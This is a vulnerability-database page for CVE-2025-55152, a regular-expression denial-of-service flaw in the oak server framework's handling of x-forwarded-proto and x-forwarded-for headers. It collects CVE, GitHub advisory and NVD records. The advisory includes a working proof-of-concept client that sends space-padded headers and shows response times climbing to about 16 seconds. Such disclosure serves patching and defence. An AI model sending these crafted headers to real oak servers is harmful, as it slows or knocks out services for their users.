cvelistv5 - cve-2025-55152

CVE-2025-55152 (GCVE-0-2025-55152)

Vulnerability from cvelistv5

Published

2025-08-09 01:29

Modified

2025-08-11 13:33

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-400 - Uncontrolled Resource Consumption
CWE-1333 - Inefficient Regular Expression Complexity

Summary

oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it's possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.

References

URL

Tags

	security-advisories@github.com	https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44
	security-advisories@github.com	https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9

Impacted products

	Vendor	Product	Version
	oakserver	oak	Version: < 17.1.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55152",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-11T13:33:12.274447Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-11T13:33:40.071Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "oak",
          "vendor": "oakserver",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 17.1.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333: Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-09T01:29:54.545Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
        },
        {
          "name": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
        }
      ],
      "source": {
        "advisory": "GHSA-r3v7-pc4g-7xp9",
        "discovery": "UNKNOWN"
      },
      "title": "oak: ReDoS in x-forwarded-proto and x-forwarded-for headers"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55152",
    "datePublished": "2025-08-09T01:29:54.545Z",
    "dateReserved": "2025-08-07T18:27:23.305Z",
    "dateUpdated": "2025-08-11T13:33:40.071Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55152\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-09T02:15:38.033\",\"lastModified\":\"2025-08-11T18:32:48.867\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.\"},{\"lang\":\"es\",\"value\":\"oak es un framework de middleware para el servidor HTTP nativo de Deno, Deno Deploy, Node.js 16.5 y versiones posteriores, Cloudflare Workers y Bun. En las versiones 17.1.5 y anteriores, es posible ralentizar significativamente un servidor oak con valores especialmente manipulados de los encabezados x-forwarded-proto o x-forwarded-for.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"},{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"references\":[{\"url\":\"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-11T13:33:12.274447Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-11T13:33:16.293Z\"}}], \"cna\": {\"title\": \"oak: ReDoS in x-forwarded-proto and x-forwarded-for headers\", \"source\": {\"advisory\": \"GHSA-r3v7-pc4g-7xp9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"oakserver\", \"product\": \"oak\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 17.1.6\"}]}], \"references\": [{\"url\": \"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\", \"name\": \"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\", \"name\": \"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1333\", \"description\": \"CWE-1333: Inefficient Regular Expression Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-09T01:29:54.545Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-11T13:33:40.071Z\", \"dateReserved\": \"2025-08-07T18:27:23.305Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-09T01:29:54.545Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-r3v7-pc4g-7xp9

Vulnerability from github

Published

2025-08-12 00:15

Modified

2025-08-12 00:15

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Summary

Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers

Details

Summary

With specially crafted value of the x-forwarded-proto or x-forwarded-for headers, it's possible to significantly slow down an oak server.

Vulnerable Code

https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

PoC

setup deno --version deno 2.4.3 v8 13.7.152.14-rusty typescript 5.8.3
server.ts ```ts import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({proxy: true});

let i = 1

app.use((ctx) => {

// let url = ctx.request.url   // test1) x-forwarded-proto
let ips = ctx.request.ips   // test2) x-forwarded-for
console.log(`request ${i} received`)
i++;
ctx.response.body = "hello";

});

await app.listen({ port: 8080 }); ```

client.ts ```ts const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A'); const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A');

async function run(data) { for (let i = 0; i < data.length; i++) { let d = data[i];

    const start = performance.now();

    await fetch("http://localhost:8080", {
        headers: {
            // "x-forwarded-proto": d,  // test1)
            "x-forwarded-for": d,    // test2)
        },
    });

    const end = performance.now();
    console.log('length=%d, time=%d ms', d.length, end - start);
}

}

console.log("\n[+] Test normal behavior") await run(data1) console.log("\n[+] Test payloads") await run(data2) ```

run ``` deno run --allow-net server.ts deno run --allow-net client.ts

[+] Test normal behavior length=2002, time=14 ms length=4002, time=6 ms length=8002, time=3 ms length=16002, time=3 ms length=32002, time=2 ms length=64002, time=4 ms length=128002, time=3 ms

[+] Test payloads length=2002, time=7 ms length=4002, time=22 ms length=8002, time=77 ms length=16002, time=241 ms length=32002, time=947 ms length=64002, time=4020 ms length=128002, time=15840 ms ```

Impact

A specially crafted value of the x-forwarded-proto or x-forwarded-for headers can be used to significantly slow down an oak server.

Similar Issues

https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
- https://github.com/denoland/deno/pull/17722
https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oakserver/oak"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "14.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55152"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T00:15:00Z",
    "nvd_published_at": "2025-08-09T02:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nWith specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers, it\u0027s possible\u00a0to significantly slow down an oak server.\n\n### Vulnerable Code\n\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142\n\n### PoC\n\n- setup\n```\ndeno --version\ndeno 2.4.3\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n```\n\n- `server.ts`\n```ts\nimport { Application } from \"https://deno.land/x/oak/mod.ts\";\n\nconst app = new Application({proxy: true});\n\nlet i = 1\n\napp.use((ctx) =\u003e {\n\n    // let url = ctx.request.url   // test1) x-forwarded-proto\n    let ips = ctx.request.ips   // test2) x-forwarded-for\n    console.log(`request ${i} received`)\n    i++;\n    ctx.response.body = \"hello\";\n});\n\nawait app.listen({ port: 8080 });\n```\n\n- `client.ts`\n```ts\nconst lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]\n\nconst data1 = lengths.map(l =\u003e \u0027A\u0027 + \u0027A\u0027.repeat(l) + \u0027A\u0027);\nconst data2 = lengths.map(l =\u003e \u0027A\u0027 + \u0027 \u0027.repeat(l) + \u0027A\u0027);\n\nasync function run(data) {\n    for (let i = 0; i \u003c data.length; i++) {\n        let d = data[i];\n        \n        const start = performance.now();\n\n        await fetch(\"http://localhost:8080\", {\n            headers: {\n                // \"x-forwarded-proto\": d,  // test1)\n                \"x-forwarded-for\": d,    // test2)\n            },\n        });\n\n        const end = performance.now();\n        console.log(\u0027length=%d, time=%d ms\u0027, d.length, end - start);\n    }\n}\n\nconsole.log(\"\\n[+] Test normal behavior\")\nawait run(data1)\nconsole.log(\"\\n[+] Test payloads\")\nawait run(data2)\n```\n\n- run\n```\ndeno run --allow-net server.ts\ndeno run --allow-net client.ts\n\n[+] Test normal behavior\nlength=2002, time=14 ms\nlength=4002, time=6 ms\nlength=8002, time=3 ms\nlength=16002, time=3 ms\nlength=32002, time=2 ms\nlength=64002, time=4 ms\nlength=128002, time=3 ms\n\n[+] Test payloads\nlength=2002, time=7 ms\nlength=4002, time=22 ms\nlength=8002, time=77 ms\nlength=16002, time=241 ms\nlength=32002, time=947 ms\nlength=64002, time=4020 ms\nlength=128002, time=15840 ms\n```\n\n\n### Impact\n\nA specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers\u00a0 can be used to significantly slow down an oak server.\n\n### Similar Issues\n\n- https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6\n\t- https://github.com/denoland/deno/pull/17722\n- https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693\n\t- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff",
  "id": "GHSA-r3v7-pc4g-7xp9",
  "modified": "2025-08-12T00:15:00Z",
  "published": "2025-08-12T00:15:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55152"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/oakserver/oak"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers"
}

fkie_cve-2025-55152

Vulnerability from fkie_nvd

Published

2025-08-09 02:15

Modified

2025-08-11 18:32

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44
	security-advisories@github.com	https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers."
    },
    {
      "lang": "es",
      "value": "oak es un framework de middleware para el servidor HTTP nativo de Deno, Deno Deploy, Node.js 16.5 y versiones posteriores, Cloudflare Workers y Bun. En las versiones 17.1.5 y anteriores, es posible ralentizar significativamente un servidor oak con valores especialmente manipulados de los encabezados x-forwarded-proto o x-forwarded-for."
    }
  ],
  "id": "CVE-2025-55152",
  "lastModified": "2025-08-11T18:32:48.867",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-09T02:15:38.033",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        },
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-55152 (GCVE-0-2025-55152)

Vulnerability from cvelistv5

ghsa-r3v7-pc4g-7xp9

Vulnerability from github

Summary

Vulnerable Code

PoC

Impact

Similar Issues

fkie_cve-2025-55152

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature